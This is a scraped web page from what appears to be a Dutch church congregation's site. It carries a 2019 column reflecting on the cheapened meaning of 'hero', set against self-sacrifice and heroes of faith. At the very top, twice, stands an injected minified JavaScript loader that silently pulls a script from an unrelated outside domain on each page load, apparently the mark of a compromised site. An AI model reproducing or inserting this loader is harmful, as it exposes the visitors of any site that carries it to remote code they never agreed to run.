;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Held ... - PKN Damwâld

Held …

Gepubliceerd op: dinsdag 22 januari 2019

Volgens Wikipedia (U weet misschien wel, de ‘encyclopedie’ op Internet) is een held (mannelijk) of heldin (vrouwelijk) een bestaand, fictief of historisch persoon die, wanneer hij wordt geconfronteerd met gevaar en rampspoed of vanuit een zwakke positie moed en de bereidheid tot zelfopoffering toont voor een grotere zaak. Aanvankelijk had dit heldendom vaak te maken met strijd of het uitblinken in iets, maar later werd dit uitgebreid tot een meer algemeen moreel uitblinken.
Is het misschien daarom dat ik zo ’n moeite heb met de benaming ‘held’ voor heel veel mensen die ‘iets’ hebben gepresteerd, meestal voor eigen eer of eigen roem, zonder ook maar iets voor een ander te hebben betekend, wiens inspanning niets met moed heeft te maken en waarvan de enige zelfopoffering is dat men afstand neemt van een wat wij dan zouden noemen normaal sociaal leven,met als doel een positie in de top of toch tenminste ruim boven de middelmaat voor zicht zelf te verkrijgen en die dan de benaming ‘held’ meekrijgen.
Is het woord held niet enorm afgebrokkeld ?
Wanneer men tegenwoordig iets bovengemiddeld presteert in sport, muziek of wat dan ook maar krijgt men al heel snel het stempel ‘held’ opgeplakt.
Ook wanneer men activiteiten uithaalt die normaliter onder waaghalzerij of onverantwoorde overmoed zouden worden betiteld krijgt men al snel het predicaat ‘held’ opgeplakt.
Wel moeten we constateren dat wanneer er met deze personen iets ernstigs gebeurt de publieke opinie zich direct tegen hen keert en zij van waaghalzerij en onverantwoordelijk gedrag worden beschuldigd. De publieke opinie kan snel verkeren.
Er zijn echter voorbeelden van mensen die met risico voor eigen lijf of goed zich hebben ingezet voor een medeschepsel. In gevaarlijke situaties door ongevallen, brand of geweld zijn er mensen die bereid zijn hun leven in gevaar te brengen om anderen bij te staan.
Ook is er sprake van geloofshelden; Mensen die bereid zijn voor een grotere zaak onrecht en vervolging te leiden en te ondergaan. Mensen die bereid zijn te getuigen van een grotere macht dan de macht waarmee zij op deze aarde worden geconfronteerd en die hun wil bedwingen.
Zijn wij bereid een dergelijke held te zijn of scharen wij ons liever bij de groep die een wereldse heldenstatus nastreeft?

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns